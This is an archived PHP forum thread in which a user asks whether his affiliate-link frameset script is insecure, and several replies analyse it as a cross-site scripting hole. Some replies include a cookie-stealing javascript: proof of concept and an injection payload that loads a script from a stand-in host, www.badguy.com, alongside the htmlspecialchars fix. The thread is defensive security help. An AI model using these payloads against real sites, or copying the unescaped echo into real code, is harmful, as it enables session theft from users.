Connecting Tech Pros Worldwide Forums | Help | Site Map
bytes > topic > php > answers

Does this php script cause a security hole?

jasonbrown1999@yahoo.co.uk
Guest
  
Posts: n/a
#1: Jul 17 '05
Someone told me the following script could be used to run harmful
commands on the server, by passing commands into the script. What the
script does is encode an affiliate URL, create two frames, with the
affiliate URL decoded and placed in the bottom URL. The top frame
contains http://www.domain.com/selectanothercard.html for navigation
back to the originating site.

The script is accessed with a link like this:

<a href="sendcard.php?url=<? echo
base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
?>" target=_top>Send Card</a>

The affiliate URL is first encoded, because otherwise it breaks (the
ampersands cause problems). I tried another frame re-directing script,
but it wouldn't carry through the affiliate info properly, so someone
created this php script to encode/decode and create the frames.

Could this script be used to send harmful commands to the server? If
so, is there any way of modifying the script to fix that? Perhaps there
are other alternatives to passing an affiliate URL into a frame like
this script does?

Jason

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>
<frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
border="0">
<frame src="http://www.domain.com/selectanothercard.html"
name="topFrame" scrolling="NO" noresize >
<frame src="<? echo base64_decode($url); ?>" name="mainFrame">
</frameset>
<noframes>
<body>
Your browser does not support frames.
</body>
</noframes>
</html>

<?
//////////////////////////////////////////////////////////////////////////////
// NOTES
//////////////////////////////////////////////////////////////////////////////
/*

HOW TO LINK TO THIS FRAMESET
----------------------------

* Your document that contains the links, must have the file extension
..php

EXAMPLE LINK:

<a href="sendcard.php?url=<? echo
base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
?>" target=_top>Send Card</a>

*/

//////////////////////////////////////////////////////////////////////////////
// END NOTES
//////////////////////////////////////////////////////////////////////////////
?>

Aidan
Guest
  
Posts: n/a
#2: Jul 17 '05

re: Does this php script cause a security hole?

No securtiy issues that I can see (though I wouldn't take my word alone), as
it doesn't take any input from the user apart from clicking the link, which
is not handled by PHP anyway...

HTH

<jasonbrown1999@yahoo.co.uk> wrote in message
news:1105662298.516750.230480@z14g2000cwz.googlegr oups.com...[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>
> The script is accessed with a link like this:
>
> <a href="sendcard.php?url=<? echo
> base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
> ?>" target=_top>Send Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.
>
> Could this script be used to send harmful commands to the server? If
> so, is there any way of modifying the script to fix that? Perhaps there
> are other alternatives to passing an affiliate URL into a frame like
> this script does?
>
> Jason
>
> <html>
> <head>
> <title></title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
> </head>
> <frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
> border="0">
> <frame src="http://www.domain.com/selectanothercard.html"
> name="topFrame" scrolling="NO" noresize >
> <frame src="<? echo base64_decode($url); ?>" name="mainFrame">
> </frameset>
> <noframes>
> <body>
> Your browser does not support frames.
> </body>
> </noframes>
> </html>
>
> <?
> //////////////////////////////////////////////////////////////////////////////
> // NOTES
> //////////////////////////////////////////////////////////////////////////////
> /*
>
> HOW TO LINK TO THIS FRAMESET
> ----------------------------
>
> * Your document that contains the links, must have the file extension
> .php
>
> EXAMPLE LINK:
>
> <a href="sendcard.php?url=<? echo
> base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
> ?>" target=_top>Send Card</a>
>
> */
>
> //////////////////////////////////////////////////////////////////////////////
> // END NOTES
> //////////////////////////////////////////////////////////////////////////////
> ?>
>[/color]
Aidan
Guest
  
Posts: n/a
#3: Jul 17 '05

re: Does this php script cause a security hole?

On second inspection, there may be an issue if you have register globals
enabled... this is because of this code:

<? echo base64_decode($url); ?>

If you have register_globals enabled on your web-server, then an attacker
could put data into the $url variable via the URL, which is bad... In order
to fix it, I recommend sanitizing the $url var before you use it (maybe even
after you've decoded it), then once you've sanatized the input, embed it
into the href attribute of the <a> tag.

HTH

"Aidan" <nospam.aidan@linknet.com.au> wrote in message
news:newscache$79baai$bnc$1@titan.linknet.com.au.. .[color=blue]
> No securtiy issues that I can see (though I wouldn't take my word alone),
> as it doesn't take any input from the user apart from clicking the link,
> which is not handled by PHP anyway...
>
> HTH
>
> <jasonbrown1999@yahoo.co.uk> wrote in message
> news:1105662298.516750.230480@z14g2000cwz.googlegr oups.com...[color=green]
>> Someone told me the following script could be used to run harmful
>> commands on the server, by passing commands into the script. What the
>> script does is encode an affiliate URL, create two frames, with the
>> affiliate URL decoded and placed in the bottom URL. The top frame
>> contains http://www.domain.com/selectanothercard.html for navigation
>> back to the originating site.
>>
>> The script is accessed with a link like this:
>>
>> <a href="sendcard.php?url=<? echo
>> base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
>> ?>" target=_top>Send Card</a>
>>
>> The affiliate URL is first encoded, because otherwise it breaks (the
>> ampersands cause problems). I tried another frame re-directing script,
>> but it wouldn't carry through the affiliate info properly, so someone
>> created this php script to encode/decode and create the frames.
>>
>> Could this script be used to send harmful commands to the server? If
>> so, is there any way of modifying the script to fix that? Perhaps there
>> are other alternatives to passing an affiliate URL into a frame like
>> this script does?
>>
>> Jason
>>
>> <html>
>> <head>
>> <title></title>
>> <meta http-equiv="Content-Type" content="text/html;
>> charset=iso-8859-1">
>> </head>
>> <frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
>> border="0">
>> <frame src="http://www.domain.com/selectanothercard.html"
>> name="topFrame" scrolling="NO" noresize >
>> <frame src="<? echo base64_decode($url); ?>" name="mainFrame">
>> </frameset>
>> <noframes>
>> <body>
>> Your browser does not support frames.
>> </body>
>> </noframes>
>> </html>
>>
>> <?
>> //////////////////////////////////////////////////////////////////////////////
>> // NOTES
>> //////////////////////////////////////////////////////////////////////////////
>> /*
>>
>> HOW TO LINK TO THIS FRAMESET
>> ----------------------------
>>
>> * Your document that contains the links, must have the file extension
>> .php
>>
>> EXAMPLE LINK:
>>
>> <a href="sendcard.php?url=<? echo
>> base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
>> ?>" target=_top>Send Card</a>
>>
>> */
>>
>> //////////////////////////////////////////////////////////////////////////////
>> // END NOTES
>> //////////////////////////////////////////////////////////////////////////////
>> ?>
>>[/color]
>
>[/color]
Chung Leong
Guest
  
Posts: n/a
#4: Jul 17 '05

re: Does this php script cause a security hole?

<jasonbrown1999@yahoo.co.uk> wrote in message
news:1105662298.516750.230480@z14g2000cwz.googlegr oups.com...[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>[/color]

I don't see any server side problem either. There could be a cross-site
scripting vulnerability in the code though. If I email the following url to
unsuspecting users of your site:

http://whatever.net/sendcard.php?url...ocument.cookie)

then I can potentially steal the cookie (PHP session id et al) when they
click on the link. I'm hedging my response a bit, because Javascript
execution is more limited in a frameset page. I'm 90% sure though that the
browser would run the JS snippet in the URL.

There's almost a potential for a phishing attack.
Rick
Guest
  
Posts: n/a
#5: Jul 17 '05

re: Does this php script cause a security hole?

jasonbrown1999@yahoo.co.uk wrote:
[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script.[/color]

If in doubt, assume your code is insecure.

Basic rule of thumb is "Never use variables the come from the client for
anything without checking them first." (especially the querystring as its
the first place someone will try to tinker)

--

Rick

Digital Printing
www.intelligence-direct.com - 01270 215550
Dani CS
Guest
  
Posts: n/a
#6: Jul 17 '05

re: Does this php script cause a security hole?

jasonbrown1999@yahoo.co.uk wrote:[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.[/color]

I'd rather use the 'Back' button in my broswer.
[color=blue]
>
> The script is accessed with a link like this:
>
> <a href="sendcard.php?url=<? echo
> base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1&aid=12345");
> ?>" target=_top>Send Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.[/color]

With htmlspecialchars() you get a shorter encoding.
[color=blue]
>
> Could this script be used to send harmful commands to the server? If
> so, is there any way of modifying the script to fix that? Perhaps there
> are other alternatives to passing an affiliate URL into a frame like
> this script does?
>
> Jason
>
> <html>
> <head>
> <title></title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
> </head>
> <frameset rows="50,*" cols="*" framespacing="0" frameborder="NO"
> border="0">
> <frame src="http://www.domain.com/selectanothercard.html"
> name="topFrame" scrolling="NO" noresize >
> <frame src="<? echo base64_decode($url); ?>" name="mainFrame">[/color]

Suposse that base64_decode($url); decodes to the following:

"></frameset> <script
src="http://www.badguy.com/nasty_thing.js"></script><input type="hidden"
value="

(note that the first quotes will close the starting quotes from <frame
src=" and then the <input> will leave open quotes that match the ending
quote of <frame src="...">)

The resulting HTML sent to the browser would be:

....
<frame src=""></frameset> <script
src="http://www.badguy.com/nasty_thing.js"></script><input type="hidden"
value="" name="mainFrame">
....


In that case your frameset HTML code will be compromised (nasty_thing.js
could do things like rewriting your documents, or loading a URL of its
choice into any of them [however, the browser might set some
restrictions for scripts belonging to another domain name]).

The fix is simple: use htmlspecialchars(base64_decode($url)). The quotes
will be replaced by &quot; and the processed HTML code will look like:

<frame src="&quot;&gt;&lt;/frameset&gt; &lt;script
src=&quot;http://www.badguy.com/nasty_thing.js...t&gt;&lt;input
type=&quot;hidden&quot; value=&quot;" name="mainFrame">
....

which will confuse the browser (invalid URL for src) but nothing else.


[color=blue]
> </frameset>
> <noframes>
> <body>
> Your browser does not support frames.[/color]

You should try your best to deliver useful content to the user.
[color=blue]
> </body>
> </noframes>
> </html>
>[/color]
<snip>
jasonbrown1999@yahoo.co.uk
Guest
  
Posts: n/a
#7: Jul 17 '05

re: Does this php script cause a security hole?

> I'd rather use the 'Back' button in my broswer.

That would have been simpler, but it requires 2 clicks to get back to
my site, otherwise you're sent forwards again, because of how the
affiliate program is set up.

The altered script looks like the following? I don't need to adjust the
'encode' URL as well?

<frame src="<? echo htmlspecialchars(base64_decode($url)); ?>"
name="mainFrame">
</frameset>

Jason
Chung Leong
Guest
  
Posts: n/a
#8: Jul 17 '05

re: Does this php script cause a security hole?

"Chung Leong" <chernyshevsky@hotmail.com> wrote in message
news:e5Kdndu1zeMGr3rcRVn-sw@comcast.com...[color=blue]
> <jasonbrown1999@yahoo.co.uk> wrote in message
> news:1105662298.516750.230480@z14g2000cwz.googlegr oups.com...[color=green]
> > Someone told me the following script could be used to run harmful
> > commands on the server, by passing commands into the script. What the
> > script does is encode an affiliate URL, create two frames, with the
> > affiliate URL decoded and placed in the bottom URL. The top frame
> > contains http://www.domain.com/selectanothercard.html for navigation
> > back to the originating site.
> >[/color]
>
> I don't see any server side problem either. There could be a cross-site
> scripting vulnerability in the code though. If I email the following url[/color]
to[color=blue]
> unsuspecting users of your site:
>
> http://whatever.net/sendcard.php?url...ocument.cookie)
>
> then I can potentially steal the cookie (PHP session id et al) when they
> click on the link. I'm hedging my response a bit, because Javascript
> execution is more limited in a frameset page. I'm 90% sure though that the
> browser would run the JS snippet in the URL.
>
> There's almost a potential for a phishing attack.
>[/color]

Yup, it does work. The following code will bring up the PHP session id:

<? session_start(); ?>
<frameset rows="50,50">
<frame src="http://localhost/test/info.php">
<frame src="javascript: alert(parent.document.cookie);">
</frameset>

To actually exploit it, someone would replace alert() with code that send
the cookie to another web site.
CJ Llewellyn
Guest
  
Posts: n/a
#9: Jul 17 '05

re: Does this php script cause a security hole?

<jasonbrown1999@yahoo.co.uk> wrote in message
news:1105662298.516750.230480@z14g2000cwz.googlegr oups.com...[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>
> The script is accessed with a link like this:
>
> <a href="sendcard.php?url=<? echo
>[/color]
base64_encode("http://affiliateurl.com/ecards/fourthjuly11107/index.php?en=1
&aid=12345");[color=blue]
> ?>" target=_top>Send Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.[/color]

And your problem with using urlencode is? Furthermore, is it realy nessecary
to send all that information to your server via a URL?
[color=blue]
> Could this script be used to send harmful commands to the server?[/color]

Yes, but the problem does not rest with the affiliate script, it depends on
the what the script (sendcard.php) that processes the link does with the
information.
Closed Thread

« previous question | next question »

Similar PHP bytes

/bytes/development

/bytes/it

Forums
Visit our community forums for general discussions and latest on Bytes

Our staff and community areas have moved to bytes.com/forums/

/bytes/about

We are a network of experts and professionals in IT and software development that help one another with answers to tough questions and share insights. Get the best answers to your questions from over 226,471 network members.

dev questions:
algorithms | asp | asp.net | c/c++ | coldfusion | c# | flash | html/css | java | javascript |
mobile dev | .net | perl | php | python | ruby | software dev | vb.net | visual basic | xml
it questions:
access | apache | careers | db2 | iis | macosx | mysql | networking | oracle | postgresql | sql server | unix | windows

About Bytes | Copyright 1995-2009 BYTES. All rights Reserved